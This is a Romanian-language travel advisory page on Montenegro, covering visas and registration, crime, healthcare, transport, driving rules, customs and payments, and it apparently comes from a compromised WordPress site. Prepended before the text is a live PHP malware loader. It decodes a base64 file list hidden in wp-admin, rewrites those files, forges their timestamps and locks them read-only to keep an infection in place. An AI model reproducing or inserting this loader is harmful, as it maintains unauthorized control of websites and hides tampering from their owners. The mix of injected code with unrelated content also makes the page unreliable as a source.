$wp_update_file="/home/shuffles/public_html/wp-admin/user/screens.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } Muntenegru – O noua atitudine

Atenţionare: Restricţii de circulaţie în Muntenegru


Condiţii de intrare şi regim de şedere

Cetăţenii români pot intra în Muntenegru fără viză, pe baza unui paşaport valabil pentru o perioadă de 90 de zile într-un semestru.

În scop turistic, cetăţenii români pot intra în Muntenegru pe baza cărţii de identitate valabile pentru o perioadă de 30 de zile.

În cazul unei deplasări cu durata de peste 3 zile în acelaşi loc, cetăţenii români trebuie să se înregistreze la poliţie, într-un interval de 24 de ore de la momentul sosirii. De asemenea, înaintea părăsirii teritoriului acestui stat, cetăţenii români trebuie să anuleze înregistrarea făcută la autorităţi.

În cazul unei cazări la hotel sau în regim privat, proprietarul este obligat să efectueze această înregistrare, în termen de 12 ore de la sosire, respectiv să o anuleze la plecarea dumneavoastră.

Atenţie! Nerespectarea regimului şederii in Muntenegru se pedepseşte cu închisoare de la 5-30 zile.

Cetăţenii români sunt sfătuiţi să consulte broşura publicată de guvernul muntenegrean în cooperare cu Delegaţia UE la Podgoriţa şi OIM.

Ministerul Afacerilor Externe recomandă cetăţenilor români care intenţionează să rămână pentru o perioadă îndelungată pe teritoriul acestui stat să se adreseze misiunii diplomatice a României şi să îşi anunţe prezenţa în regiune, comunicând coordonatele personale pentru a putea fi contactaţi în situaţii de urgenţă.


Ameninţări teroriste 

Terorismul este un fenomen global, nelocalizat, prin urmare nici Muntenegru nu poate fi exclusă din faţa acestei ameninţări.

Muntenegru nu a suferit atacuri teroriste directe pe teritoriul naţional.
Vă sfătuim să urmăriţi în permanenţă anunţurile şi recomandările făcute de autorităţile muntenegrene şi să accesaţi periodic site-ul web al Ministerului român al Afacerilor Externe (www.mae.ro).


Siguranţa şi criminalitate 

Numărul infracţiunilor violente (crime, tâlhării) este redus, infracţionalitatea fiind ţinută sub control de autorităţi. Cazuri de acest gen in care sa fie implicaţi cetăţeni străini nu au fost semnalate decât foarte rar.

Recomandări generale:

  • Păstraţi în locuri sigure documentele, valorile personale, biletele de călătorie banii, cărţile de credit şi nu le expuneţi în mod vizibil asupra dumneavoastră sau în maşini.
  • Maşinile trebuie încuiate şi asigurate cu sisteme de alarmă.
  • În cazul călătoriei cu autobuzul sau trenul păstraţi atenţia asupra bagajelor pe întreaga durată a călătoriei.
  • Pentru ieşirile în oraşe, în special în zonele aglomerate, lăsaţi documentele personale la hotel şi păstraţi numai o copie a actelor de identitate.
  • Parcaţi autoturismul, chiar şi pentru perioade scurte, numai în parcări păzite.

În cazul unor incidente care afectează siguranţa persoanei sau a bunurilor, vă recomandăm contactarea celui mai apropiat birou al poliţiei, precum şi contactarea  Ambasada României în Muntenegru.


Sistemul medical 

Încheiaţi o asigurare de călătorie, medicală şi de viaţă!

Sistemul medical are două componente: de stat şi privat. În sistemul privat accesul este nelimitat, contra cost, la tarifele practicate curent.

Pentru asistenta medicala de urgenta, gratuit, este necesară asigurarea medicală încheiată la firmele autorizate din ţară înainte de efectuarea călătoriei.

În Muntenegru nu sunt necesare vaccinări speciale.


Transport public  

Muntenegru dispune de două aeroporturi Podgorita şi Tivat (acesta operează numai în sezonul estival).

Prin aeroportul Podgorita şi cel de la Tivat, pe timpul verii, sunt legături directe cu principalele capitale europene şi 2-3 curse zilnice la Belgrad. Alte destinaţii curente: Viena, Milano, Paris, Frankfurt, Budapesta, Praga, Paris, Bruxelles, Londra.

Pe calea ferată există o singură rută Belgrad-Bijelo Polje-Podgorita-Bar, care asigura legătura cu Serbia fără a avea alte ramificaţii interne.

Din portul muntenegrean Bar pleacă curse de ferry-boat pe trei direcţii Bar-Bari (Italia)-Bar; Bar-Ancona (Italia)-Bar si Bar-Duress (Albania)-Bar.


Condiţii privind traficul auto 

  • Circulaţia auto

Circulaţia auto se efectuează pe partea dreaptă.

Se aplică prioritatea de dreaptă în intersecţii, iar în sensul giratoriu prioritatea de stângă.
În trafic se circulă cu faza de întâlnire aprinsă.

În zonele montane se impune o adaptare a vitezei în raport cu starea drumului.
În sezonul estival rutele spre litoral sunt aglomerate.

Drumul de coasta, la Marea Adriatică este aglomerat în sezon. Pentru rutele secundare trebuie obţinute din timp date suplimentare deoarece reţeaua drumurilor locale este în bună parte îngustă, la dimensiunile unei singure benzi de circulaţie, parapeţi de protecţie ceea ce poate pune probleme reale unor conducători cu experienţa redusă.

Amenzile pentru abateri de la normele de circulaţie se încadrează între 20-50 euro.

  • Starea drumurilor

Starea generala a drumurilor este bună.

Muntenegru nu dispune de autostrăzi.

Pe ruta Podgorica – Sozine – Bar se plăteşte o taxă de 2.50 euro pentru trecerea printr-un tunel de circa 5 km.

  • Limitele maxime de viteză admise
    • 60 km/h
    • în afara localităţilor 80 km/h

Atenţie! Respectaţi cu stricteţe limitările de viteză şi prevederile legate de utilizarea dispozitivelor “hands-free” ale telefonului mobil în timpul conducerii autovehiculului.

  • Centura de siguranţă

Purtarea centurii de siguranţă este obligatorie.

  • Folosirea telefonului mobil la volan:

Este interzisă.

  • Permisul de conducere

Permisul de conducere romanesc este recunoscut.

  • Informaţii pentru cazurile de accident de circulaţie

Accidentele de orice fel trebuie anunţate la politie, iar agenţii de circulaţie care întocmesc documentele de constatare le supun spre soluţionare unei instanţe de judecată-singura în măsura sa ia decizii. Numai în baza deciziei unei instanţe se eliberează ulterior, de către politie dovada pentru reparaţii.


Reglementări vamale

Este obligatorie declararea sumelor mai mari de 5000 euro, sau echivalentul in alte valute. Sumele de bani trebuie declarate în scris, în declaraţia vamala.
Este interzisa introducerea in Muntenegru de droguri, alte tipuri de substanţe similare, armament, muniţie, exploziv, substanţe toxice sau radioactive.

Este interzisă introducerea de bunuri de acelaşi fel în cantităţi însemnate, în vederea comercializării (îndeosebi ţigări, băuturi alcoolice, etc.).

La punctele de frontieră terestre se percepe o taxă ecologică în valoare de 20 euro pentru autoturisme şi 50 euro pentru autobuze şi camioane, indiferent de numărul pasagerilor.


Regimul medicamentelor 

Medicamentele pot fi introduse în ţară numai pentru necesităţi personale, în baza reţetelor, fiselor de externare din spital sau alte documente în care este înscris diagnosticul, în original, în care se fac prescrierile de tratament.


Utilizarea cărţilor de credit 

Moneda locală este euro.

În Muntenegru există un sistem bancar destul de dezvoltat. Se acceptă plata cu cărţile de credit la marile magazine, restaurante şi staţii de benzină.


Regimul animalelor de companie 

Animalele de companie pot fi introduse în Muntenegru în baza unor dovezi privind starea de sănătate a animalelor şi situaţia vaccinărilor eliberate în ţara de domiciliu.

Sursa: www.mae.ro

By o9admin